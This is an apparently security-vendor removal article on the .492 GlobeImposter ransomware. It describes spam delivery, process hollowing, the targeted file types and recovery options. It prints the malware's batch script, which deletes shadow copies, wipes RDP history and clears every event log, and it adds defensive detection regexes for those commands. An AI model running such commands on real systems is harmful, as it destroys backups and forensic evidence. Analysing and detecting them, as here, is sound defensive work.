.492 File Virus - Remove and Restore Your Files (GlobeImposter)

This article shows how to remove the .492 GlobeImposter ransomware variant and how to approach the recovery of files it has encrypted with the .492 extension.

Yet another version of the notorious GlobeImposter ransomware has appeared in the wild. Like the previous .726 and .725 variants, this one uses a three-digit number as the extension it appends to the files it encrypts. The purpose of the .492 file virus is to encrypt the files on the compromised computer and then extort the victim into paying a hefty ransom to get them back. If you have been hit by this ransomware, we recommend that you read this article completely to learn how to remove the virus and how to try to get your data back without paying.

Threat Summary

Name: .492 File Virus
Type: Ransomware, Cryptovirus
Short Description: Encrypts the files on the infected computer and displays a ransom note that aims to extort victims into paying a hefty ransom fee.
Symptoms: Files are encrypted and given the .492 extension; a ransom note named here_your_files!.html is dropped.
Distribution Method: Spam e-mails, e-mail attachments, executable files

How Does the .492 File Virus Infect?

The .492 ransomware is distributed by e-mail. The criminals behind it send large waves of spam to a pre-compiled list of victim addresses. The e-mails pose as legitimate payment receipts, but instead of a receipt the attachment the victim opens is the infection file of the .492 ransomware. One reported spam campaign spreading GlobeImposter ransomware in this way was documented by Malware-Traffic-Analysis.net (source: Malware-Traffic-Analysis.net).

Another form of e-mail spam associated with the .492 GlobeImposter variant delivers the malicious file in a blank e-mail: the message carries no subject and no body text, only the malicious attachment. Malware researchers have observed this blank spam spreading the .492 ransomware dropper, and the details of the sample have been reported on VirusTotal.

.492 File Virus – Activity

The .492 ransomware is not the kind of malware you want on your computer. Once it runs, it attacks several parts of Windows, starting by launching its own processes to gain control of the system. If it obtains administrative privileges, it uses them to perform a series of malicious actions.

One such action is to execute a batch file (.bat) with the following commands:

@echo off
REM Delete every Volume Shadow Copy so previous file versions cannot be restored
vssadmin.exe Delete Shadows /All /Quiet
REM Wipe the Remote Desktop connection history: default settings and the list of recent servers
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
REM Remove the hidden Default.rdp file that caches the last RDP connection
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
REM Enumerate every Windows event log and clear each one (wevtutil cl takes the log name as argument)
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

The registry commands do not set up persistence. They delete the Terminal Server Client (Remote Desktop) history that Windows keeps under HKEY_CURRENT_USER, i.e. the default connection settings and the list of servers the user recently connected to, and then re-create an empty Servers key. Together with the deletion of Default.rdp from the user's Documents folder and the loop that clears every Windows event log, this erases evidence of how the machine was reached and what happened on it, a typical anti-forensics step on hosts accessed over Remote Desktop. The vssadmin command deletes the Shadow Volume Copies so that you cannot restore earlier versions of your files from them.
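The commands in that batch file are also good detection material: each of them is rare in normal process-creation telemetry, and the combination is what a ransomware staging script looks like. The following is an added example (not code from the article or from the malware) of detection logic run over process-creation records. The records are constructed in a simplified Windows Security Event ID 4688 style with assumed `NewProcessName=` and `CommandLine=` fields; they are not real telemetry, and the field layout is an assumption to keep the example self-contained.

```python
"""Flag the GlobeImposter anti-recovery / anti-forensics commands quoted above
in process-creation records. Added example; the sample records are constructed."""
import re
from collections import Counter
from typing import List, NamedTuple


class Hit(NamedTuple):
    line_no: int
    rule: str
    record: str


# One rule per line of the batch file above, plus the .txt.exe dropper name.
# Patterns are searched in the whole record, so they fire on the command line
# no matter how the surrounding event fields are laid out.
RULES = [
    # vssadmin.exe Delete Shadows /All /Quiet
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    # reg delete "HKCU\Software\Microsoft\Terminal Server Client\..." /f
    ("rdp_history_wipe",
     re.compile(r"\breg(?:\.exe)?\s+delete\s+.*terminal server client", re.I)),
    # attrib Default.rdp -s -h / del Default.rdp
    ("default_rdp_removal",
     re.compile(r"\b(?:attrib|del)\s+.*default\.rdp\b", re.I)),
    # for ... DO wevtutil.exe cl "%1"
    ("event_log_clearing",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)),
    # dropper posing as a document: double extension ending in .exe
    ("double_extension_executable",
     re.compile(r"\.(?:txt|pdf|doc|docx|xls|xlsx|jpg)\.exe\b", re.I)),
]

# Constructed records (simplified 4688 layout, assumed field names), not real telemetry.
SAMPLE_4688 = [
    r"4688 NewProcessName=C:\Windows\System32\svchost.exe CommandLine=svchost.exe -k netsvcs",
    r"4688 NewProcessName=C:\Users\anna\AppData\Local\Temp\receipt.txt.exe CommandLine=receipt.txt.exe",
    r"4688 NewProcessName=C:\Windows\System32\vssadmin.exe CommandLine=vssadmin.exe Delete Shadows /All /Quiet",
    r'4688 NewProcessName=C:\Windows\System32\reg.exe CommandLine=reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f',
    r"4688 NewProcessName=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c del Default.rdp",
    r'4688 NewProcessName=C:\Windows\System32\wevtutil.exe CommandLine=wevtutil.exe cl "Security"',
    r"4688 NewProcessName=C:\Windows\System32\vssadmin.exe CommandLine=vssadmin.exe list shadows",
]


def scan(records: List[str]) -> List[Hit]:
    """Return one Hit for every (record, rule) pair that matches, in record order."""
    hits = []
    for n, rec in enumerate(records, 1):
        for name, rx in RULES:
            if rx.search(rec):
                hits.append(Hit(n, name, rec))
    return hits


def rule_counts(hits: List[Hit]) -> Counter:
    """How many records each rule fired on."""
    return Counter(h.rule for h in hits)


def looks_like_ransomware_staging(hits: List[Hit], min_rules: int = 2) -> bool:
    """A single rule can fire on legitimate admin work (a help-desk script
    clearing RDP history, for instance). Two or more *distinct* rules in the
    same batch of records is the pattern the .bat file above produces."""
    return len(rule_counts(hits)) >= min_rules


if __name__ == "__main__":
    found = scan(SAMPLE_4688)
    for h in found:
        print(f"record {h.line_no}: {h.rule}")
    print("staging detected:", looks_like_ransomware_staging(found))
```

The threshold in `looks_like_ransomware_staging` is the part worth tuning: `vssadmin delete shadows` alone is a strong signal on a workstation but is routine on some backup servers, whereas the RDP history wipe followed by event log clearing has almost no benign explanation.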

One malicious process is reported to be started with the CREATE_SUSPENDED flag. This is a process-creation flag rather than a function: the new process is created but its main thread does not start running, which gives the ransomware time to overwrite the process memory with malicious code it has previously unpacked before it resumes the thread (a technique commonly called process hollowing).

The unpacked code therefore runs under the name of an innocuous-looking process, so you notice none of this activity. The dropper itself may pose as a text document while actually being an executable; a double extension such as .txt.exe gives it away, provided Windows is configured to show file extensions.

The same process also tampers with the computer's power settings: it sets the Sleep option in Power Options to "Never", so that the machine stays awake while the .492 ransomware performs its malicious activity.

The .492 GlobeImposter variant has also been built to hinder analysis while it runs: most of its strings are kept encrypted, and part of the Windows API (Application Programming Interface) functions it relies on are obscured rather than imported openly. Having "set up the ground" for the damage it is about to do, the .492 variant begins to encrypt the files on the infected computer.

.492 Ransomware – Encryption Analysis

The encryption routine of the .492 file virus is selective: it encrypts only certain file types and skips certain folders. It carries a "white list", i.e. an exclusion list of folder names in which it does not encrypt anything. Most of these folders belong to Windows itself, to installed security products or to browsers, so the computer keeps working after the victim's data has been encrypted and the ransom note can be displayed. The excluded folders are the following:

Windows, Microsoft, Microsoft Help, Windows App Certification Kit, Windows Defender, ESET, COMODO, Windows NT, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Temp, NVIDIA Corporation, Microsoft.NET, Internet Explorer, Kaspersky Lab, McAfee, Avira, spytech software, sysconfig, Avast, Dr.Web, Symantec, Symantec_Client_Security, system volume information, AVG, Microsoft Shared, Common Files, Outlook Express, Movie Maker, Chrome, Mozilla Firefox, Opera, YandexBrowser, ntldr, Wsus, ProgramData.

While those folders are fortunately spared, the .492 ransomware shows no mercy to audio, video, database, image and other user file types. The 170 file extensions it attacks, as reported by Xiaopeng Zhang at Fortinet, are the following (note that the list is dominated by database formats):

.$er .4db .4dd .4d .4mp .abs .abx .accdb .accdc .accde .accdr .accdt .accdw .accft .adn .adp .aft .ahd .alf .ask .awdb .azz .bdb .bib .bnd .bok .btr .cdb .cdb .cdb .ckp .clkw .cma .crd .daconnections .dacpac .dad .dadiagrams .daf .daschema .db .db-shm .db-wa .db2 .db3 .dbc .dbf .dbf .dbk .dbs .dbt .dbv .dbx .dcb .dct .dcx .dd .df1 .dmo .dnc .dp1 .dqy .dsk .dsn .dta .dtsx .dx .eco .ecx .edb .emd .eq .fcd .fdb .fic .fid .fi .fm5 .fmp .fmp12 .fmps .fo .fp3 .fp4 .fp5 .fp7 .fpt .fzb .fzv .gdb .gwi .hdb .his .ib .idc .ihx .itdb .itw .jtx .kdb .lgc .maq .mdb .mdbhtm .mdf .mdn .mdt .mrg .mud .mwb .myd .ndf .ns2 .ns3 .ns4 .nsf .nv2 .nyf .oce .odb .oqy .ora .orx .owc .owg .oyx .p96 .p97 .pan .pdb .pdm .phm .pnz .pth .pwa .qpx .qry .qvd .rctd .rdb .rpd .rsd .sbf .sdb .sdf .spq .sqb .sq .sqlite .sqlite3 .sqlitedb .str .tcx .tdt .te .teacher .tmd .trm .udb .usr .v12 .vdb .vpd .wdb .wmdb .xdb .xld .xlgc .zdb .zdc
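The two lists above (the excluded folders and the targeted extensions) fully describe which files the variant goes after, which is useful when estimating the blast radius on a file server or when checking that a backup set covers the right data. The following is an added example that models those selection rules; it is not the ransomware's code. Two details are assumptions, because the article does not state them: that a folder is excluded when any directory component of the path matches a white-listed name exactly (case-insensitively), and that the extension match is on the last suffix only. The paths are constructed, and the extension set is a subset of the 170 listed above.

```python
"""Model of the .492 variant's file-selection rules: skip paths that pass
through an excluded folder, pick files with a targeted extension, and show the
name a file gets after encryption. Added example; matching rules are assumptions."""
from pathlib import PureWindowsPath
from typing import Iterable, List

# Folder white list quoted in the article. Assumption: exact, case-insensitive
# match against each directory component of the path.
EXCLUDED_DIRS = {d.strip().lower() for d in """
Windows, Microsoft, Microsoft Help, Windows App Certification Kit, Windows Defender,
ESET, COMODO, Windows NT, Windows Kits, Windows Mail, Windows Media Player,
Windows Multimedia Platform, Windows Phone Kits, Windows Phone Silverlight Kits,
Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell,
Temp, NVIDIA Corporation, Microsoft.NET, Internet Explorer, Kaspersky Lab, McAfee,
Avira, spytech software, sysconfig, Avast, Dr.Web, Symantec, Symantec_Client_Security,
system volume information, AVG, Microsoft Shared, Common Files, Outlook Express,
Movie Maker, Chrome, Mozilla Firefox, Opera, YandexBrowser, ntldr, Wsus, ProgramData
""".replace("\n", " ").split(",")}

# Subset of the 170 extensions reported by Fortinet and listed in the article.
TARGET_EXTS = {
    ".accdb", ".mdb", ".db", ".db3", ".dbf", ".sqlite", ".sqlite3", ".sqlitedb",
    ".mdf", ".ndf", ".fdb", ".gdb", ".kdb", ".nsf", ".odb", ".pdb", ".sdf",
    ".wdb", ".edb", ".myd",
}

RANSOM_EXT = ".492"  # appended after the original extension


def is_excluded(path: str) -> bool:
    """True if any directory component (the file name excluded) is white-listed."""
    parts = PureWindowsPath(path).parts[:-1]
    return any(p.lower() in EXCLUDED_DIRS for p in parts)


def is_target(path: str) -> bool:
    """True if the file's last extension is one the ransomware goes after."""
    return PureWindowsPath(path).suffix.lower() in TARGET_EXTS


def select_targets(paths: Iterable[str]) -> List[str]:
    """Files the .492 variant would encrypt: targeted extension, not in an excluded folder."""
    return [p for p in paths if is_target(p) and not is_excluded(p)]


def encrypted_name(path: str) -> str:
    """GlobeImposter keeps the original name and appends its own extension."""
    return path + RANSOM_EXT


# Constructed paths, not from a real system.
SAMPLE_TREE = [
    r"C:\Users\anna\Documents\customers.accdb",                     # targeted
    r"C:\Users\anna\AppData\Local\Temp\scratch.db",                 # skipped: Temp
    r"C:\Program Files\Kaspersky Lab\KES\bases\rules.db",           # skipped: Kaspersky Lab
    r"C:\ProgramData\Vendor\cache.sqlite",                          # skipped: ProgramData
    r"C:\Windows\System32\config\SOFTWARE",                         # skipped: Windows, no extension
    r"D:\Finance\ledger.sqlite3",                                   # targeted
    r"D:\Finance\notes.txt",                                        # extension not on the list
]

if __name__ == "__main__":
    for p in select_targets(SAMPLE_TREE):
        print(p, "->", encrypted_name(p))
```

Run against a real tree, the same two predicates show why the white list matters to the attacker and not to the victim: everything under the user profile and on data drives is fair game, and only files under Temp, ProgramData or security-product folders survive.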

After the encryption process has completed, the ransomware also renames each file by appending its own extension after the original one, so that a file such as report.accdb appears as report.accdb.492 and can no longer be opened by its usual program.

The .492 ransomware then drops its extortion message, a ransom note file named here_your_files!.html, which tells the victim how to contact the criminals and pay.

How to Remove .492 Virus and Recover Files

Before you begin removing this ransomware from your computer, back up the encrypted files first, for example to an external drive. The copy protects you if something goes wrong during removal and is needed should a decryptor for this variant become available later.

After backing up your files, proceed with the removal of the .492 ransomware by following the removal instructions below. If the manual steps prove difficult, the most reliable way to remove .492 ransomware completely is a reputable anti-malware product that detects this family; it will also help protect the computer in the future.

If your files carry the .492 extension, try the alternative methods and tools suggested in step "2. Restore files encrypted by .492 File Virus" below. None of them breaks the encryption itself: file recovery software can only find original copies that were deleted but not yet overwritten on disk, and Shadow Volume Copies help only where the vssadmin command above failed to run. They do not have a 100% success rate, but they will recover as many files as possible.

Ventsislav Krastev

Ventsislav has been covering the latest malware, software and newest tech developments at SensorsTechForum for 3 years now. He started out as a network administrator. Having graduated in Marketing as well, Ventsislav also has a passion for discovering new shifts and innovations in cybersecurity that become game changers. After studying Value Chain Management and then Network Administration, he found his passion within cybersecurity and is a strong believer in basic education of every user towards online safety.

